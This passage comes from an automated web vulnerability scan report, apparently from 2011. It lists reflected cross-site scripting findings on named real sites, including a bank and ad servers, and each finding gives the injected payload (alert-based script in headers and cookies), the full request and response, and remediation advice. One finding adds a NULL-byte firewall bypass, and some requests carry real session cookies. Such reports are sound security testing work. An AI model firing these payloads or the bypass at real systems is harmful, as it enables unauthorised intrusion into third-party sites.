The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00ba07d"-alert(1)-"85da7928a00 was submitted in the Referer HTTP header. This input was echoed as ba07d"-alert(1)-"85da7928a00 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /spportal/spportalFlow.do?_flowExecutionKey=_c47FC5CD2-84B0-15BA-BBD6-7F2890FFCE5D_k1D7E1B65-A481-322E-8A3E-9052CB09A537 HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: %00ba07d"-alert(1)-"85da7928a00
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; mbox=check#true#1296759589|session#1296759528614-838261#1296761389; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:13:59 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 24677


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="%00ba07d"-alert(1)-"85da7928a00";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

4.693. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af436"-alert(1)-"c8d45d1ae80 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10af436"-alert(1)-"c8d45d1ae80
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750668049-www.superpages.com-11243779-100942; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:31:08 GMT; Path=/
Set-Cookie: JSESSIONID=70291ECCDC9094D55B86156B11544BBB; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:07 GMT
Content-Length: 65808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ally Bank in Philad
...[SNIP]...

var remote_add = "REMOTE_ADDR=173.193.214.243";
var http_user = "HTTP_USER_AGENT=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10af436"-alert(1)-"c8d45d1ae80";
var datServ = 'http://ugc-int.superpages.com';
var imgLoc = "http://img.superpages.com/images-yp/sp/images/ugc/";
var imServ = 'http://media.superpages.com/media/photos/';
var lidforpageload = '2118
...[SNIP]...

4.694. http://www.us.hsbc.com/1/2/3 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.us.hsbc.com
Path:   /1/2/3

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae894"-alert(1)-"9ef9bbddbcc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1/2/3?command=makeThisMyHome&hp_pref=r HTTP/1.1
Host: www.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Referer: http://www.google.com/search?hl=en&q=ae894"-alert(1)-"9ef9bbddbcc

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:09:17 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Thu, 03 Feb 2011 17:10:17 GMT
Vary: User-Agent,Cookie
Content-Length: 5930
Set-Cookie: USIB2G=0000uiCjKm5hpdCoVHLx-JRHofH:14k1jbteq; Path=/
S: hbus-vh502_1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equiv="Content-Type" content="
...[SNIP]...
.getTime()+(365*24*60*60*1000));
       var expires = "; expires="+date.toGMTString();
       document.cookie = "hp_pref"+"="+"r"+expires+"; path=/";


               window.location="http://www.google.com/search?hl=en&q=ae894"-alert(1)-"9ef9bbddbcc"
</script>
...[SNIP]...

4.695. http://bh.contextweb.com/bh/sync/admeld [V cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/sync/admeld

Issue detail

The value of the V cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59a51'-alert(1)-'a6f6442db was submitted in the V cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bh/sync/admeld?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=8&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754790274&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F65
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj59a51'-alert(1)-'a6f6442db; cwbh1=2709%3B03%2F02%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F05%2F2011%3BFOCI1

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
Set-Cookie: V=gFEcJzqCjXJj59a51'-alert(1)-'a6f6442db; Domain=.contextweb.com; Expires=Sun, 29-Jan-2012 18:54:52 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 214
Date: Thu, 03 Feb 2011 18:54:52 GMT

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=8&external_user_id=gFEcJzqCjXJj59a51'-alert(1)-'a6f6442db&_segment=2%7CgFEcJzqCjXJj59a51'-alert(1)-'a6f6442db%7C"/>
...[SNIP]...

4.696. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [ZEDOIDA cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 591c4"-alert(1)-"65b65c1c305 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=9&q=&$=&s=134&z=0.00999015336856246 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411591c4"-alert(1)-"65b65c1c305; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=125
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:59 GMT
Connection: close
Content-Length: 2549

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat='';var zzC
...[SNIP]...
);}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411591c4"-alert(1)-"65b65c1c305';

var zzhasAd=undefined;


               var zzStr = "s=134;u=INmz6woBADYAAHrQ5V4AAACH~010411591c4"-alert(1)-"65b65c1c305;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

4.697. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [ZEDOIDA cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc04b"-alert(1)-"93a36e51360 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=14&q=&$=&s=134&z=0.39839196810498834 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&css=banner&p=locm.sp&pos=4&t=4&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411dc04b"-alert(1)-"93a36e51360; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1; FFad=0; FFcat=1220,175,9

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,14:1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=130
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:54 GMT
Connection: close
Content-Length: 2536

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat='';var zzC
...[SNIP]...
);}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411dc04b"-alert(1)-"93a36e51360';

var zzhasAd=undefined;


               var zzStr = "s=134;u=INmz6woBADYAAHrQ5V4AAACH~010411dc04b"-alert(1)-"93a36e51360;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

4.698. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [ZEDOIDA cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fmr.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ba9d"-alert(1)-"5d6a06513d5 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fmr.js?c=175&a=0&f=&n=1220&r=13&d=9&q=&$=&s=134&z=0.00999015336856246 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~0104119ba9d"-alert(1)-"5d6a06513d5; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=122
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:10:02 GMT
Connection: close
Content-Length: 2537

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat='';var zzC
...[SNIP]...
);}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~0104119ba9d"-alert(1)-"5d6a06513d5';

var zzhasAd=undefined;


               var zzStr = "s=134;u=INmz6woBADYAAHrQ5V4AAACH~0104119ba9d"-alert(1)-"5d6a06513d5;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

4.699. http://da.newstogram.com/hg.php [DMUserTrack cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://da.newstogram.com
Path:   /hg.php

Issue detail

The value of the DMUserTrack cookie is copied into the HTML document as plain text between tags. The payload 6897e<img%20src%3da%20onerror%3dalert(1)>f1b5e532c19 was submitted in the DMUserTrack cookie. This input was echoed as 6897e<img src=a onerror=alert(1)>f1b5e532c19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /hg.php?uid=B46354F1-787D-4611-AE0D-C5EFA6EF634B&k=e58aac080a2606121e77aba437a3165d&s=http%3A//mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert%281%29%253C/script%253E1f35e8c0ea2/&r=http%3A//burp/show/49&q=0&e=2&cid=&callback=Newstogram.completed HTTP/1.1
Host: da.newstogram.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1105555422-1296072885434; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3%276897e<img%20src%3da%20onerror%3dalert(1)>f1b5e532c19

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Thu, 03 Feb 2011 18:54:27 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.3
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate
Set-Cookie: DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3%276897e%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ef1b5e532c19; expires=Fri, 03-Feb-2012 18:54:27 GMT; domain=.newstogram.com
Content-Length: 167

Newstogram.completed({"Histogram":{"status":"error","uid":"76DB7C80-A3AF-45F2-82C2-8381798839F3'6897e<img src=a onerror=alert(1)>f1b5e532c19","ip":"173.193.214.243"}})

4.700. http://gsbmtg.rtrk.com/ [RlocalUID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /

Issue detail

The value of the RlocalUID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc711"><script>alert(1)</script>103b14f1145 was submitted in the RlocalUID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
